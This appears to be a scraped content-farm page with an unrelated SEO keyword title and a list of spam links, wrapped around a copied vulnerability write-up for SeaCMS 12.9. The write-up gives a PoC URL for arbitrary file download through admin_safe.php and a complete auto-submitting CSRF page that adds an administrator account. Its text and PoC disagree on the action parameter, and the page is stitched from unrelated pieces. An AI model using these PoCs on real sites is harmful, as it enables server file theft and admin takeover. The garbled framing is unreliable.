当前位置: 首页 > news >正文

深圳一建公司seo算法

深圳一建公司,seo算法,wordpress适配熊掌号,手机网站设计建设文章目录 admin/admin_safe.php任意文件下载CSRF 添加管理员账户CSRF配合XSS弹cookie admin/admin_safe.php任意文件下载 在admin_safe.php文件下有着这么一段代码,他的作用时检查action的值是否为download,如果为download那么将你传入的文件直接打印给…

文章目录

    • admin/admin_safe.php任意文件下载
    • CSRF 添加管理员账户
    • CSRF配合XSS弹cookie

admin/admin_safe.php任意文件下载

在admin_safe.php文件下有着这么一段代码,他的作用时检查action的值是否为download,如果为download那么将你传入的文件直接打印给你。这里并未对用户传入的file变量做任何过滤。
在这里插入图片描述
poc:http://www.seacms/ozcf6u/admin_safe.php?action=scan&file=E:/phpStudy_64/phpstudy_pro/WWW/SeaCMS_12.9/Upload/ozcf6u/admin_safe.php,即可下载任意目录下的文件。
在这里插入图片描述

CSRF 添加管理员账户

poc:

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><form action="http://www.seacms/ozcf6u/admin_manager.php?action=add" method="POST"><input type="hidden" name="username" value="test" /><input type="hidden" name="pwd" value="test" /><input type="hidden" name="pwd2" value="test" /><input type="hidden" name="groupid" value="1" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body>
</html>

成功效果图:
在这里插入图片描述

CSRF配合XSS弹cookie

很多漏洞网上很多师傅都大多复现过,大同小异,这里就不赘述了。

http://www.ds6.com.cn/news/49869.html

相关文章:

  • 杭州做网站比较好的公司网络营销推广方案论文
  • 如何规划一个外贸网站2022十大网络营销案例
  • 怎么做网站推广怀化个人网站建站教程
  • 即墨网站建设哪家好百度一下你就知道主页
  • 网站备案还是域名备案南宁百度seo排名优化
  • cms网站网络地址图片网络营销的现状
  • 微信上的网站怎么做的北京最新疫情
  • web前端只做网站么珠海百度关键字优化
  • 最火爆的网络游戏排行榜广州百度seo排名
  • 湖南长沙关键词推广电话seo查询系统
  • 小程序制作多少钱山西seo
  • 营销型企业网站建设流程网络营销买什么好
  • 个人网站鉴赏开发一个网站需要多少钱
  • 网页特效的认识seo实战培训
  • iis网站子目录设置二级域名百度排行榜风云榜
  • 旅游网站如何做推广seo收索引擎优化
  • 政府网站建设的突出问题推广途径有哪些
  • 做网站有关机械的图片百度开放平台
  • 广州h5网站建设公司北京公司排名seo
  • 哪些平台属于c2c模式seo价格查询公司
  • 外包公司与劳务派遣搜索引擎优化不包括
  • 做网站建设公司哪家好友情链接交易网站
  • 淄博网站制作企业营销seo排名优化软件有用
  • 网站分站是怎么做的百度怎么做推广
  • 莆田市建设局网站百度站长工具官网
  • 赚钱网站导航全国防疫大数据平台
  • 合肥seo软件扬州seo推广
  • wordpress图片变小了温州seo推广外包
  • 地区门户网站 建设攻略企业管理咨询培训
  • 手机网站app开发电商中seo是什么意思